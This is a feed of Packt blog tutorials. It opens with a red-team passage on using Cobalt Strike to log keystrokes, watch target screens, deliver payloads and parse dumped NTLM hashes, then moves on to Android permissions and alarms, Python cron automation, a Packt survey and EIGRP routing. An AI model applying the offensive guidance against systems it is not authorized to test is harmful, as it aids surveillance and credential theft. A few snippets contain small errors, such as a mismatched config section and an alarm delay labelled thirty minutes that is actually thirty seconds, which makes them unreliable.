keylogger. Once you do this, you can see that there's a new entry in the Keystrokes tab: The left side of the tab will show the information related to the beacon. This may include the user, the computer name, the PID in which the keylogger is injected, and the timestamp when the keylogger sends the saved keystrokes to the beacon. In contrast, the right side of the tab will show you the keystrokes that were logged. 
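Everything collected in these views (sessions, credentials, downloads, keystrokes) can also be worked on outside the client. As a purely hypothetical example, if you export credential entries to a text file in the classic hashdump format (user:rid:lmhash:nthash:::), a few lines of Python are enough to de-duplicate them by NTLM hash; Cobalt Strike's own export format may differ, so treat this as an illustration rather than a documented workflow.

# Hypothetical helper: group exported hashdump lines by NTLM hash.
creds_file = "hashdump_export.txt"   # assumed export path

unique = {}
with open(creds_file) as handle:
    for line in handle:
        line = line.strip()
        if not line or line.count(":") < 3:
            continue                  # skip blanks and malformed lines
        user, rid, lm_hash, nt_hash = line.split(":")[:4]
        unique.setdefault(nt_hash.lower(), []).append(user)

for nt_hash, users in unique.items():
    # accounts sharing an NTLM hash share the same password
    print(f"{nt_hash}  used by: {', '.join(sorted(set(users)))}")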
Screenshots To view the screenshots from the target system, click on the button shown in the following screenshot: This will open up the tab for screenshots. Here, you will get to know what's happening on the system's screen at that moment itself. This is quite helpful when a server administrator is logged in to the system and works on Active Directory (AD) and Domain Controller (DC) settings. When monitoring the screen, we can find crucial information that can lead to DC compromise: To know about Payload generation in stageless Windows executable, Java signed applet, and MS Office macros, head over to the book for a complete overview. Scripted web delivery This technique is used to deliver the payload via the web. To continue, click on the button shown in the following screenshot: A scripted web delivery will deliver the payload to the target system when the generated command/script is executed on the system. A new window will open where you can select the type of script/command that will be used for payload delivery. Here, you also have the option to add the listener accordingly: File hosting Files that you want to host on a web server can also be hosted through the Cobalt Strike team server. To host a file through the team server, click on the button shown in the following screenshot: This will bring up the window where you can set the URI, the file you want to host, the web server's IP address and port, and the MIME type. Once done, you can download the same file from the Cobalt Strike team server's web server. You can also provide the IP and port information of your favorite web redirector. This method is generally used for payload delivery: Managing the web server The web server running on the team server, which is generally used for file hosting and beacons, can be managed as well. To manage the web server, click on the button shown in the following screenshot: This will open the Sites tab where you can find all web services, the beacons, and the jobs assigned to those running beacons. You can manage the jobs here: Server switchbar The Cobalt Strike client can connect to multiple team servers at the same time and you can manage all the existing connections through the server switchbar. The switchbar allows you to switch between the server instances: You can also rename the instances according to the role of the server. To do this, simply right-click on the Instance tab and you'll get two options: Rename and Disconnect: You need to click on the Rename button to rename the instance of your choice. Once you click this button, you'll be prompted for the new name that you want to give to your instance: For now, we have changed this to EspionageServer: Renaming the switchbar helps a lot when it comes to managing multiple sessions from multiple team servers at the same time. To know more about how to customize a team server head over to the book. To summarize, we got to know what a team server is, how to setup Cobalt Strike and about the Cobalt Strike Interface. If you've enjoyed reading this, head over to the book, Hands-On Red Team Tactics to know about advanced penetration testing tools, techniques to get reverse shells over encrypted channels, and processes for post-exploitation. 
“All of my engineering teams have a machine learning feature on their roadmap” – Will Ballard talks artificial intelligence in 2019 [Interview] IEEE Computer Society predicts top ten tech trends for 2019: assisted transportation, chatbots, and deep learning accelerators among others Facebook releases DeepFocus, an AI-powered rendering system to make virtual reality more real

Getting your Android app ready for the Play Store[Tutorial]

Natasha Mathur
11 Jan 2019
11 min read
In this tutorial, we will discuss adding finishing touches to your Android app before you release it to the play store such as using the Android 6.0 Runtime permission model, scheduling an alarm,  receiving notification of a device boot, Using AsyncTask for background work recipe, adding speech recognition to your app,  and adding Google sign-in to your app. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores more than 100 proven industry standard recipes and strategies to help you build feature-rich and reliable Android Pie apps. The Android 6.0 Runtime Permission Model The old security model was a sore point for many in Android. It's common to see reviews commenting on the permissions an app requires. Sometimes, permissions were unrealistic (such as a Flashlight app requiring internet permission), but other times, the developer had good reasons to request certain permissions. The main problem was that it was an all-or-nothing prospect. This finally changed with the Android 6 Marshmallow (API 23) release. The new permission model still declares permissions in the manifest as before, but users have the option of selectively accepting or denying each permission. Users can even revoke a previously granted permission. Although this is a welcome change for many, for a developer, it has the potential to break the code that was working before. Google now requires apps to target Android 6.0 (API 23) and above to be included on the Play Store. If you haven't already updated your app, apps not updated will be removed by the end of the year (2018). Getting ready Create a new project in Android Studio and call it RuntimePermission. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. The sample source code sets the minimum API to 23, but this is not required. If your compileSdkVersion is API 23 or above, the compiler will flag your code for the new security model. How to do it... We need to start by adding our required permission to the manifest, then we'll add a button to call our check permission code. 
Open the Android Manifest and follow these steps: Add the following permission: Open activity_main.xml and replace the existing TextView with this button: Open MainActivity.java and add the following constant to the class: private final int REQUEST_PERMISSION_SEND_SMS=1; Add this method for a permission check: private boolean checkPermission(String permission) { int permissionCheck = ContextCompat.checkSelfPermission( this, permission); return (permissionCheck == PackageManager.PERMISSION_GRANTED); } Add this method to request permission: private void requestPermission(String permissionName, int permissionRequestCode) { ActivityCompat.requestPermissions(this, new String[]{permissionName}, permissionRequestCode); } Add this method to show the explanation dialog: private void showExplanation(String title, String message, final String permission, final int permissionRequestCode) { AlertDialog.Builder builder = new AlertDialog.Builder(this); builder.setTitle(title) .setMessage(message) .setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog,int id) { requestPermission(permission, permissionRequestCode); } }); builder.create().show(); } Add this method to handle the button click: public void doSomething(View view) { if (!checkPermission(Manifest.permission.SEND_SMS)) { if (ActivityCompat.shouldShowRequestPermissionRationale(this, Manifest.permission.SEND_SMS)) { showExplanation("Permission Needed", "Rationale", Manifest.permission.SEND_SMS, REQUEST_PERMISSION_SEND_SMS); } else { requestPermission(Manifest.permission.SEND_SMS, REQUEST_PERMISSION_SEND_SMS); } } else { Toast.makeText(MainActivity.this, "Permission (already) Granted!", Toast.LENGTH_SHORT) .show(); } } Override onRequestPermissionsResult() as follows: @Override public void onRequestPermissionsResult(int requestCode, String permissions[], int[] grantResults) { switch (requestCode) { case REQUEST_PERMISSION_SEND_SMS: { if (grantResults.length > 0 && grantResults[0] == PackageManager.PERMISSION_GRANTED) { Toast.makeText(MainActivity.this, "Granted!", Toast.LENGTH_SHORT) .show(); } else { Toast.makeText(MainActivity.this, "Denied!", Toast.LENGTH_SHORT) .show(); } return; } } } Now, you're ready to run the application on a device or emulator. How it works... Using the new Runtime Permission model involves the following: Check to see whether you have the desired permissions If not, check whether we should display the rationale (meaning that the request was previously denied) Request the permission; only the OS can display the permission request Handle the request response Here are the corresponding methods: ContextCompat.checkSelfPermission ActivityCompat.requestPermissions ActivityCompat.shouldShowRequestPermissionRationale onRequestPermissionsResult Even though you are requesting permissions at runtime, the desired permission must be listed in the Android Manifest. If the permission is not specified, the OS will automatically deny the request. How to schedule an alarm Android provides AlarmManager to create and schedule alarms. 
Alarms offer the following features: Schedule alarms for a set time or interval Maintained by the OS, not your application, so alarms are triggered even if your application is not running or the device is asleep Can be used to trigger periodic tasks (such as an hourly news update), even if your application is not running Your app does not use resources (such as timers or background services), since the OS manages the scheduling Alarms are not the best solution if you need a simple delay while your application is running (such as a short delay for a UI event.) For short delays, it's easier and more efficient to use a Handler, as we've done in several previous recipes. When using alarms, keep these best practices in mind: Use as infrequent an alarm timing as possible Avoid waking up the device Use as imprecise timing as possible; the more precise the timing, the more resources required Avoid setting alarm times based on clock time (such as 12:00); add random adjustments if possible to avoid congestion on servers (especially important when checking for new content, such as weather or news) Alarms have three properties, as follows: Alarm type (see in the following list) Trigger time (if the time has already passed, the alarm is triggered immediately) Pending Intent A repeating alarm has the same three properties, plus an Interval: Alarm type (see the following list) Trigger time (if the time has already passed, it triggers immediately) Interval Pending Intent There are four alarm types: RTC (Real Time Clock): This is based on the wall clock time. This does not wake the device. RTC_WAKEUP: This is based on the wall clock time. This wakes the device if it is sleeping. ELAPSED_REALTIME: This is based on the time elapsed since the device boot. This does not wake the device. ELAPSED_REALTIME_WAKEUP: This is based on the time elapsed since the device boot. This wakes the device if it is sleeping. Elapsed Real Time is better for time interval alarms, such as every 30 minutes. Alarms do not persist after device reboots. All alarms are canceled when a device shuts down, so it is your app's responsibility to reset the alarms on device boot. The following recipe will demonstrate how to create alarms with AlarmManager. Getting ready Create a new project in Android Studio and call it Alarms. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. How to do it... Setting an alarm requires a Pending Intent, which Android sends when the alarm is triggered. Therefore, we need to set up a Broadcast Receiving to capture the alarm intent. Our UI will consist of just a simple button to set the alarm. 
To start, open the Android Manifest and follow these steps: Add the following <receiver> to the <application> element at the same level as the existing <activity> element: Open activity_main.xml and replace the existing TextView with the following button: Create a new Java class called AlarmBroadcastReceiver using the following code: public class AlarmBroadcastReceiver extends BroadcastReceiver { public static final String ACTION_ALARM= "com.packtpub.alarms.ACTION_ALARM"; @Override public void onReceive(Context context, Intent intent) { if (ACTION_ALARM.equals(intent.getAction())) { Toast.makeText(context, ACTION_ALARM, Toast.LENGTH_SHORT).show(); } } } Open ActivityMain.java and add the method for the button click: public void setAlarm(View view) { Intent intentToFire = new Intent(getApplicationContext(), AlarmBroadcastReceiver.class); intentToFire.setAction(AlarmBroadcastReceiver.ACTION_ALARM); PendingIntent alarmIntent = PendingIntent.getBroadcast(getApplicationContext(), 0, intentToFire, 0); AlarmManager alarmManager = (AlarmManager)getSystemService(Context.ALARM_SERVICE); long thirtyMinutes=SystemClock.elapsedRealtime() + 30 * 1000; alarmManager.set(AlarmManager.ELAPSED_REALTIME, thirtyMinutes, alarmIntent); } You're ready to run the application on a device or emulator. How it works... Creating the alarm is done with this line of code: alarmManager.set(AlarmManager.ELAPSED_REALTIME, thirtyMinutes, alarmIntent); Here's the method signature: set(AlarmType, Time, PendingIntent); Prior to Android 4.4 KitKat (API 19), this was the method to request an exact time. Android 4.4 and later will consider this as an inexact time for efficiency, but will not deliver the intent prior to the requested time. (See setExact() as follows if you need an exact time.) To set the alarm, we create a Pending Intent with our previously defined alarm action: public static final String ACTION_ALARM= "com.packtpub.alarms.ACTION_ALARM"; This is an arbitrary string and could be anything we want, but it needs to be unique, so we prepend our package name. We check for this action in the Broadcast Receiver's onReceive() callback. There's more... If you click the Set Alarm button and wait for thirty minutes, you will see the Toast when the alarm triggers. If you are too impatient to wait and click the Set Alarm button again before the first alarm is triggered, you won't get two alarms. Instead, the OS will replace the first alarm with the new alarm, since they both use the same Pending Intent. (If you need multiple alarms, you need to create different Pending Intents, such as using different Actions.) Cancel the alarm If you want to cancel the alarm, call the cancel() method by passing the same Pending Intent you have used to create the alarm. If we continue with our recipe, this is how it would look: alarmManager.cancel(alarmIntent); Repeating alarm If you want to create a repeating alarm, use the setRepeating() method. The Signature is similar to the set() method, but with an interval. This is shown as follows: setRepeating(AlarmType, Time (in milliseconds), Interval, PendingIntent); For the Interval, you can specify the interval time in milliseconds or use one of the predefined AlarmManager constants: INTERVAL_DAY INTERVAL_FIFTEEN_MINUTES INTERVAL_HALF_DAY INTERVAL_HALF_HOUR INTERVAL_HOUR Receiving notification of device boot Android sends out many intents during its lifetime. One of the first intents sent is ACTION_BOOT_COMPLETED. 
If your application needs to know when the device boots, you need to capture this intent. This recipe will walk you through the steps required to be notified when the device boots. Getting ready Create a new project in Android Studio and call it DeviceBoot. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. How to do it... To start, open the Android Manifest and follow these steps: Add the following permission: Add the following <receiver> to the <application> element, at the same level as the existing <activity> element: Create a new Java class called BootBroadcastReceiver using the following code: public class BootBroadcastReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { if (intent.getAction().equals( "android.intent.action.BOOT_COMPLETED")) { Toast.makeText(context, "BOOT_COMPLETED", Toast.LENGTH_SHORT).show(); } } } Reboot the device to see the Toast. How it works... When the device boots, Android will send the BOOT_COMPLETED intent. As long as our application has the permission to receive the intent, we will receive notifications in our Broadcast Receiver. There are three aspects to make this work: Permission for RECEIVE_BOOT_COMPLETED Adding both BOOT_COMPLETED and DEFAULT to the receiver intent filter Checking for the BOOT_COMPLETED action in the Broadcast Receiver Obviously, you'll want to replace the Toast message with your own code, such as for recreating any alarms you might need. Thus, in this article, we looked at different factors that need to be checked off before your app gets ready for the play store.  We discussed three topics: Android 6.0 Runtime permission model, scheduling an alarm and detecting a device reboot.  If you found this post useful, be sure to check out the book 'Android 9 Development Cookbook - Third Edition', to learn about using AsyncTask for background work recipe, adding speech recognition to your app,  and adding Google sign-in to your app. Building an Android App using the Google Faces API [ Tutorial] How Android app developers can convert iPhone apps 6 common challenges faced by Android App developers

Preparing and automating a task in Python [Tutorial]

Bhagyashree R
10 Jan 2019
15 min read
To properly automate tasks, we need a platform so that they run automatically at the proper times. A task that needs to be run manually is not really fully automated. But, in order to be able to leave them running in the background while worrying about more pressing issues, the task will need to be adequate to run in fire-and-forget mode. We should be able to monitor that it runs correctly, be sure that we are capturing future actions (such as receiving notifications if something interesting arises), and know whether there have been any errors while running it. Ensuring that a piece of software runs consistently with high reliability is actually a very big deal and is one area that, to be done properly, requires specialized knowledge and staff, which typically go by the names of sysadmin, operations, or SRE (Site Reliability Engineering). In this article, we will learn how to prepare and automatically run tasks. It covers how to program tasks to be executed when they should, instead of running them manually, and how to be notified if there has been an error in an automated process. This article is an excerpt from a book written by Jaime Buelta titled Python Automation Cookbook.  The Python Automation Cookbook helps you develop a clear understanding of how to automate your business processes using Python, including detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. To follow along with the examples implemented in the article, you can find the code on the book's GitHub repository. Preparing a task It all starts with defining exactly what task needs to be run and designing it in a way that doesn't require human intervention to run. Some ideal characteristic points are as follows: Single, clear entry point: No confusion on what the task to run is. Clear parameters: If there are any parameters, they should be very explicit. No interactivity: Stopping the execution to request information from the user is not possible. The result should be stored: To be able to be checked at a different time than when it runs. Clear result: If we are working interactively in a result, we accept more verbose results or progress reports. But, for an automated task, the final result should be as concise and to the point as possible. Errors should be logged: To analyze what went wrong. A command-line program has a lot of those characteristics already. It has a clear way of running, with defined parameters, and the result can be stored, even if just in text format. But, it can be improved with a config file to clarify the parameters and an output file. Getting ready We'll start by following a structure in which the main function will serve as the entry point, and all parameters are supplied to it. The definition of the main function with all the explicit arguments covers points 1 and 2. Point 3 is not difficult to achieve. To improve point 2 and 5, we'll look at retrieving the configuration from a file and storing the result in another. How to do it... 
Prepare the following task and save it as prepare_task_step1.py: import argparse def main(number, other_number): result = number * other_number print(f'The result is {result}') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) args = parser.parse_args() main(args.n1, args.n2) Update the file to define a config file that contains both arguments, and save it as prepare_task_step2.py: import argparse import configparser def main(number, other_number): result = number * other_number print(f'The result is {result}') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file') args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2) Create the config file config.ini: [ARGUMENTS] n1=5 n2=7 Run the command with the config file: $ python3 prepare_task_step2.py -c config.ini The result is 35 $ python3 prepare_task_step2.py -c config.ini -n1 2 -n2 3 The result is 35 Add a parameter to store the result in a file, and save it as prepare_task_step5.py: import argparse import sys import configparser def main(number, other_number, output): result = number * other_number print(f'The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file') parser.add_argument('-o', dest='output', type=argparse.FileType('w'), help='output file', default=sys.stdout) args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2, args.output) Run the result to check that it's sending the output to the defined file: $ python3 prepare_task_step5.py -n1 3 -n2 5 -o result.txt $ cat result.txt The result is 15 $ python3 prepare_task_step5.py -c config.ini -o result2.txt $ cat result2.txt The result is 35 How it works... Note that the argparse module allows us to define files as parameters, with the argparse.FileType type, and opens them automatically. This is very handy and will raise an error if the file is not valid. The configparser module allows us to use config files with ease. As demonstrated in Step 2, the parsing of the file is as simple as follows: config = configparser.ConfigParser() config.read_file(file) The config will then be accessible as a dictionary divided by sections, and then values. Note that the values are always stored in string format, requiring to be transformed into other types, such as integers. Python 3 allows us to pass a file parameter to the print function, which will write to that file. Step 5 shows the usage to redirect all the printed information to a file. Note that the default parameter is sys.stdout, which will print the value to the Terminal (standard output). 
This makes it so that calling the script without an -o parameter will display the information on the screen, which is helpful in debugging: $ python3 prepare_task_step5.py -c config.ini The result is 35 $ python3 prepare_task_step5.py -c config.ini -o result.txt $ cat result.txt The result is 35 Setting up a cron job Cron is an old-fashioned but reliable way of executing commands. It has been around since the 70s in Unix, and it's an old favorite in system administration to perform maintenance, such as freeing space, rotating logs, making backups, and other common operations. Getting ready We will produce a script, called  cron.py: import argparse import sys from datetime import datetime import configparser def main(number, other_number, output): result = number * other_number print(f'[{datetime.utcnow().isoformat()}] The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file', default='/etc/automate.ini') parser.add_argument('-o', dest='output', type=argparse.FileType('a'), help='output file', default=sys.stdout) args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2, args.output) Note the following details: The config file is by default, /etc/automate.ini. Reuse config.ini from the previous recipe. A timestamp has been added to the output. This will make it explicit when the task is run. The result is being added to the file, as shown with the 'a' mode where the file is open. The ArgumentDefaultsHelpFormatter parameter automatically adds information about default values when printing the help using the -h argument. Check that the task is producing the expected result and that you can log to a known file: $ python3 cron.py [2018-05-15 22:22:31.436912] The result is 35 $ python3 cron.py -o /path/automate.log $ cat /path/automate.log [2018-05-15 22:28:08.833272] The result is 35 How to do it... Obtain the full path of the Python interpreter. This is the interpreter that's on your virtual environment: $ which python /your/path/.venv/bin/python Prepare the cron to be executed. Get the full path and check that it can be executed with no problem. Execute it a couple of times: $ /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log $ /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Check that the result is being added correctly to the result file: $ cat /path/automate.log [2018-05-15 22:28:08.833272] The result is 35 [2018-05-15 22:28:10.510743] The result is 35 Edit the crontab file to run the task once every five minutes: $ crontab -e */5 * * * * /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Note that this opens an editing Terminal with your default command-line editor. Check the crontab contents. Note that this displays the crontab contents, but doesn't set it to edit: $ contab -l */5 * * * * /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Wait and check the result file to see how the task is being executed: $ tail -F /path/automate.log [2018-05-17 21:20:00.611540] The result is 35 [2018-05-17 21:25:01.174835] The result is 35 [2018-05-17 21:30:00.886452] The result is 35 How it works... 
The crontab line consists of a description of how often to run the task (the first five fields), followed by the task itself. Each of the initial five fields means a different unit of time. Most of them are stars, meaning any:

* * * * *
| | | | |
| | | | +---- Day of the week (range: 0-6, 0 standing for Sunday)
| | | +------ Month of the year (range: 1-12)
| | +-------- Day of the month (range: 1-31)
| +---------- Hour (range: 0-23)
+------------ Minute (range: 0-59)

Therefore, our line, */5 * * * *, means "every time the minute is divisible by 5, in all hours, on all days of the month, in all months, on all days of the week." Here are some examples:

30 15 * * * means "every day at 15:30"
30 * * * * means "every hour, at 30 minutes past"
0,30 * * * * means "every hour, at 0 and 30 minutes past"
*/30 * * * * means "every half hour"
0 0 * * 1 means "every Monday at 00:00"

Do not try to guess too much. Use a cheat sheet like crontab guru for examples and tweaks. Most of the common usages are described there directly. You can also edit a formula and get a descriptive text on how it's going to run.

After the description of how often to run the task comes the command to execute, which is the line we prepared in Step 2 of the How to do it… section.

Capturing errors and problems

An automated task's main characteristic is its fire-and-forget quality. We are not actively looking at the result, but making it run in the background. This recipe will present an automated task that safely stores unexpected behaviors in a log file that can be checked afterward.

Getting ready

As a starting point, we'll use a task that will divide two numbers, as described in the command line.

How to do it...

1. Create the task_with_error_handling_step1.py file, as follows:

import argparse
import sys


def main(number, other_number, output):
    result = number / other_number
    print(f'The result is {result}', file=output)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-n1', type=int, help='A number', default=1)
    parser.add_argument('-n2', type=int, help='Another number', default=1)
    parser.add_argument('-o', dest='output', type=argparse.FileType('w'),
                        help='output file', default=sys.stdout)
    args = parser.parse_args()

    main(args.n1, args.n2, args.output)

2. Execute it a couple of times to see that it divides two numbers:

$ python3 task_with_error_handling_step1.py -n1 3 -n2 2
The result is 1.5
$ python3 task_with_error_handling_step1.py -n1 25 -n2 5
The result is 5.0

3. Check that dividing by 0 produces an error and that the error is not logged in the result file:

$ python task_with_error_handling_step1.py -n1 5 -n2 1 -o result.txt
$ cat result.txt
The result is 5.0
$ python task_with_error_handling_step1.py -n1 5 -n2 0 -o result.txt
Traceback (most recent call last):
  File "task_with_error_handling_step1.py", line 20, in <module>
    main(args.n1, args.n2, args.output)
  File "task_with_error_handling_step1.py", line 6, in main
    result = number / other_number
ZeroDivisionError: division by zero
$ cat result.txt

4. Create the task_with_error_handling_step4.py file:

import argparse
import logging
import sys

LOG_FORMAT = '%(asctime)s %(name)s %(levelname)s %(message)s'
LOG_LEVEL = logging.DEBUG


def main(number, other_number, output):
    logging.info(f'Dividing {number} between {other_number}')
    result = number / other_number
    print(f'The result is {result}', file=output)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-n1', type=int, help='A number', default=1)
    parser.add_argument('-n2', type=int, help='Another number', default=1)
    parser.add_argument('-o', dest='output', type=argparse.FileType('w'),
                        help='output file', default=sys.stdout)
    parser.add_argument('-l', dest='log', type=str, help='log file',
                        default=None)
    args = parser.parse_args()

    if args.log:
        logging.basicConfig(format=LOG_FORMAT, filename=args.log,
                            level=LOG_LEVEL)
    else:
        logging.basicConfig(format=LOG_FORMAT, level=LOG_LEVEL)

    try:
        main(args.n1, args.n2, args.output)
    except Exception as exc:
        logging.exception("Error running task")
        exit(1)

5. Run it to check that it displays the proper INFO and ERROR logs and that it stores them in the log file:

$ python3 task_with_error_handling_step4.py -n1 5 -n2 0
2018-05-19 14:25:28,849 root INFO Dividing 5 between 0
2018-05-19 14:25:28,849 root ERROR division by zero
Traceback (most recent call last):
  File "task_with_error_handling_step4.py", line 31, in <module>
    main(args.n1, args.n2, args.output)
  File "task_with_error_handling_step4.py", line 10, in main
    result = number / other_number
ZeroDivisionError: division by zero
$ python3 task_with_error_handling_step4.py -n1 5 -n2 0 -l error.log
$ python3 task_with_error_handling_step4.py -n1 5 -n2 0 -l error.log
$ cat error.log
2018-05-19 14:26:15,376 root INFO Dividing 5 between 0
2018-05-19 14:26:15,376 root ERROR division by zero
Traceback (most recent call last):
  File "task_with_error_handling_step4.py", line 33, in <module>
    main(args.n1, args.n2, args.output)
  File "task_with_error_handling_step4.py", line 11, in main
    result = number / other_number
ZeroDivisionError: division by zero
2018-05-19 14:26:19,960 root INFO Dividing 5 between 0
2018-05-19 14:26:19,961 root ERROR division by zero
Traceback (most recent call last):
  File "task_with_error_handling_step4.py", line 33, in <module>
    main(args.n1, args.n2, args.output)
  File "task_with_error_handling_step4.py", line 11, in main
    result = number / other_number
ZeroDivisionError: division by zero

How it works...

To properly capture any unexpected exceptions, the main function should be wrapped into a try-except block, as done in Step 4 of the How to do it… section. Compare this to how Step 1 does not wrap the code:

try:
    main(...)
except Exception as exc:
    # Something went wrong
    logging.exception("Error running task")
    exit(1)

The extra step of exiting with status 1 through the exit(1) call informs the operating system that something went wrong with our script.

The logging module allows us to log. Note the basic configuration, which includes an optional file to store the logs, the format, and the level of the logs to display. Creating logs is easy. You can do this by making a call to the logging.<logging level> method (where logging level is debug, info, and so on). logging.exception() is a special case that creates an ERROR log, but also includes information about the exception, such as the stack trace.

Remember to check the logs to discover errors. A useful reminder is to add a note to the results file, like this:

try:
    main(args.n1, args.n2, args.output)
except Exception as exc:
    logging.exception(exc)
    print('There has been an error. Check the logs', file=args.output)
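One addition beyond what the recipe covers: for fire-and-forget tasks that run for a long time, the log file can grow without limit. A rotating handler from the standard library keeps it bounded. The following is a minimal sketch, with the file name and size limits being arbitrary choices:

import logging
from logging.handlers import RotatingFileHandler

LOG_FORMAT = '%(asctime)s %(name)s %(levelname)s %(message)s'

# Keep at most 5 files of roughly 1 MB each; older entries are discarded
handler = RotatingFileHandler('/path/automate.log', maxBytes=1_000_000,
                              backupCount=5)
handler.setFormatter(logging.Formatter(LOG_FORMAT))

logging.basicConfig(level=logging.DEBUG, handlers=[handler])

logging.info('This entry goes to the rotating log file')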
In this article, we saw how to define and design a task so that no human intervention is needed to run it. We learned how to use cron to automate a task. We also presented an automated task that safely stores unexpected behaviors in a log file that can be checked afterward.

If you found this post useful, do check out the book Python Automation Cookbook to develop a clear understanding of how to automate your business processes using Python. This includes detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheet reports with graphs, and communicating with automatically generated emails.

Write your first Gradle build script to start automating your project [Tutorial]
Ansible 2 for automating networking tasks on Google Cloud Platform [Tutorial]
Automating OpenStack Networking and Security with Ansible 2 [Tutorial]

Pay it Forward this New Year – Rewriting the code on career development

Packt Editorial Staff
09 Jan 2019
3 min read
This Festive and New Year period, Packt Publishing Ltd are commissioning their newest group of authors – you, the everyday expert – in order to help the next generation of developers, coders, and architects. Packt, a global leader in publishing technology and coding eBooks and videos,  are asking the technology community to ‘pay it forward’ by looking back at their career and paying their advice forward to support the next generation of technology leaders via a survey.  The aim is to rewrite the code on career development and find out what everyday life looks like for those in our community. The Pay it Forward eBook that will be created, will provide tips and insights from the tech profession. Rather than giving off the shelf advice on how to better your career, Packt are asking everyday experts – the professionals across the globe who make the industry tick – for the insights and advice they would give from the good and the bad that they have seen. The most insightful and useful responses to the survey will be published by Packt in a new eBook, which will be available for free in early 2019. Some of the questions Pay it Forward will seek answers to, include: What is the biggest myth about working in tech? If you could give one career hack, what would it be? How do you keep on top of new developments and news? What are the common challenges you have seen or experienced in your profession? Who do you most admire and why? What is the best piece of advice you have received that has helped you in your career? What advice would you give to a student wishing to enter your profession? Have you actually broken the internet? We all make mistakes, how do you handle them? What do you love about what you do? People can offer their responses here: http://payitforward.packtpub.com/ Commenting on Pay it Forward, Packt Publishing Ltd CEO and founder Dave Maclean, said, “Over time we all gain knowledge through our experiences. We’ve all failed and learned and found better ways to do things.  As we come into the New Year, we’re reflecting on what we have learned and we’re calling on our community of everyday experts to share their knowledge with people who are new to the industry, to the next generation of changemakers.” “For our part, Packt will produce a book that pulls together this advice and make it available for free to help those wishing to pursue a career within technology.” The survey should take no more than 10 minutes to complete and is in complete confidence, with no disclosure of names or details, unless agreed.

Implementing the EIGRP Routing Protocol [Tutorial]

Amrata Joshi
09 Jan 2019
13 min read
EIGRP originated from the Interior Gateway Routing Protocol (IGRP). The problem with IGRP was that it had no support for Variable Length Subnet Masking (VLSM) and it was broadcast-based. With the Enhanced Interior Gateway Routing Protocol, we now have support for VLSM, and the updates are sent via multicast using the multicast address 224.0.0.10 for IPv4.

This article is an excerpt taken from the book CCNA Routing and Switching 200-125 Certification Guide by Lazaro (Laz) Diaz. The book covers networking with routers and switches, layer 2 technology and its various configurations and connections, VLANs and inter-VLAN routing, and more. You can learn how to configure default, static, and dynamic routing, how to design and implement subnetted IPv4 and IPv6 addressing schemes, and more. This article focuses on how EIGRP works, its features, and configuring EIGRP for single autonomous systems and multiple autonomous systems.

EIGRP has a lot more to offer than its predecessor. Not only is it a classless routing protocol with VLSM capabilities, it has a maximum hop count of 255, although by default this is set to 100. It is also considered a hybrid, or advanced distance-vector, routing protocol. That means it has the better of two worlds: link state and distance vector (DV).

The DV features are just like RIPv2's: it has a limited hop count, it sends out the complete routing table to its neighboring routers the first time it tries to converge, and it summarizes routes, so you have to use the no auto-summary command to make it send out the subnet mask along with the updates. It has link state features, such as triggered updates once it has fully converged and the routing table is complete. EIGRP maintains neighbor relationships, or adjacencies, using hello messages, and when a network is added or removed, it only sends that change.

EIGRP also has a very intelligent algorithm. The DUAL algorithm considers several attributes to make a more efficient and reliable decision about which path to send the packet on to reach the destination faster. Also, EIGRP is based on autonomous systems, with a range from 1-65,535. You can have a single autonomous system, which means all the routers share the same routing table, or you can have multiple autonomous systems, in which case you have to redistribute the routes into the other AS for the routers to communicate with each other.

So, EIGRP is a very powerful routing protocol and it has a lot of benefits that allow us to run our network more efficiently. Let's create a list of the major features:

Support for VLSM or CIDR
Summarization and discontinuous networks
Best path selection using the DUAL
No broadcast; we use multicast now
Supports IPv4 and IPv6
Efficient neighbor discovery

Diffusing Update Algorithm or DUAL

This is the algorithm that allows EIGRP to have all the features it has and allows traffic to be so reliable. The following is a list of the essential tasks that it does:

Finds a backup route if the topology permits
Support for VLSM
Dynamic route recovery
Queries its neighbor routers for other alternate routes

EIGRP routers maintain a copy of all their neighbors' routes, so they can calculate their own cost to each destination network. That way, if the successor route goes down, they can query the topology table for alternate or backup routes.
